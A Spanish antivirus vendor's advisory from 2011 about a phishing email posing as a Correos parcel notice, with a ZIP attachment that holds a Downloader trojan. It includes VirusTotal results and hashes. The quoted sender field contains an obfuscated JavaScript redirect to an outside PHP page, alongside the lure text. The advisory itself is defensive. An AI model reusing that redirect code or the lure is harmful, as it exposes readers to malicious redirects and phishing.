Nuevo mail masivo aparentando ser un aviso de CORREOS, con anexado vírico

Como otras veces, se está propagando un mail que aparenta ser un aviso de Correos para la recogida de un paquete.

Indican que en el fichero adjunto hay una etiqueta para poder recogerlo …

Evidentemente la ejecucion de dicho fichero infecta el ordenador con una variante de Downloader, que la heuristica del VirusScan de McAfee, con sensibilidad a nivel medio, ya lo detecta.

Pasamos a controlarlo a partir del ELISTARA 24.38 de hoy
El mail en el que llega viene a ser:

MAIL MAILICIOSO:
________________

——– Mensaje original ——– Asunto:  Recoja su paquete postal ID81682
Fecha:  Wed, 30 Nov 2011 15:36:32 +0300
De:  Correos <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:cliente@correos.es”>cliente@correos.es>
Para:  <destinatario>
Estimado cliente.

El alcance de nuestra compania no pudo enviar el paquete a su direccion.
Causa: Error en la direccion de envio
Usted puede por si mismo recoger el paquete en su oficina de correos.
Una etiqueta postal es adjuntada a esta carta.
Tiene que imprimir la etiqueta para recoger el paquete en su oficina de correos.

Muchas gracias.
Sociedad Estatal Correos y Telegrafos.

Ficheros adjuntos:

untitled-[1.1]  0.7 k   [ text/plain ]    Descargar  |  Ver
Correo_Etiqueta.zip  115 k   [ application/octet-stream ]    Descargar

____________

FIN DEL MAIL

Al desempaquetar el fichero ZIP genera este fichero  Correo_Etiqueta.exe y 12 complementarios ocultos

El preanalisis del EXE con virustotal ofrece este informe:

File name: Correo_Etiqueta.exe
Submission date: 2011-11-30 15:17:56 (UTC)
Result: 11/ 43 (25.6%)
VT Community

not reviewed
Safety score: –
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.11.30.00 2011.11.30 –
AntiVir 7.11.18.133 2011.11.30 –
Antiy-AVL 2.0.3.7 2011.11.30 –
Avast 6.0.1289.0 2011.11.30 –
AVG 10.0.0.1190 2011.11.30 –
BitDefender 7.2 2011.11.30 –
ByteHero 1.0.0.1 2011.11.29 Trojan.Heur.Malware.Gen
CAT-QuickHeal 12.00 2011.11.30 –
ClamAV 0.97.3.0 2011.11.30 –
Commtouch 5.3.2.6 2011.11.30 W32/Yakes.G4.gen!Eldorado
Comodo 10794 2011.11.30 –
DrWeb 5.0.2.03300 2011.11.30 –
Emsisoft 5.1.0.11 2011.11.30 –
eSafe 7.0.17.0 2011.11.28 –
eTrust-Vet 37.0.9595 2011.11.30 –
F-Prot 4.6.5.141 2011.11.29 W32/Yakes.G4.gen!Eldorado
F-Secure 9.0.16440.0 2011.11.30 –
Fortinet 4.3.370.0 2011.11.30 W32/Yakes.B!tr
GData 22 2011.11.30 –
Ikarus T3.1.1.109.0 2011.11.30 –
Jiangmin 13.0.900 2011.11.30 –
K7AntiVirus 9.119.5563 2011.11.29 Riskware
Kaspersky 9.0.0.837 2011.11.30 –
McAfee 5.400.0.1158 2011.11.30 Generic.evx!bi
McAfee-GW-Edition 2010.1D 2011.11.30 Artemis!DEBBDF3909F5
Microsoft 1.7801 2011.11.30 –
NOD32 6668 2011.11.29 –
Norman 6.07.13 2011.11.30 W32/Kryptik.ATI
nProtect 2011-11-30.01 2011.11.30 –
Panda 10.0.3.5 2011.11.29 Trj/Downloader.HSL
PCTools 8.0.0.5 2011.11.30 –
Prevx 3.0 2011.11.30 –
Rising 23.86.02.02 2011.11.30 –
Sophos 4.71.0 2011.11.30 Mal/Bredo-Q
SUPERAntiSpyware 4.40.0.1006 2011.11.30 –
Symantec 20111.2.0.82 2011.11.30 Trojan.Smoaler
TheHacker 6.7.0.1.351 2011.11.30 –
TrendMicro 9.500.0.1008 2011.11.30 –
TrendMicro-HouseCall 9.500.0.1008 2011.11.30 –
VBA32 3.12.16.4 2011.11.30 –
VIPRE 11182 2011.11.30 –
ViRobot 2011.11.30.4801 2011.11.30 –
VirusBuster 14.1.91.0 2011.11.29 –
Additional informationShow all
MD5   : debbdf3909f5e1964cd44567c3904f6d
SHA1  : 999dbd68a6b2b0cdadb97cfddc0f97895d613c1d

File size : 58368 bytes
Dicha version del ELISTARA 24.38 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy

saludos

ms, 30-11-2011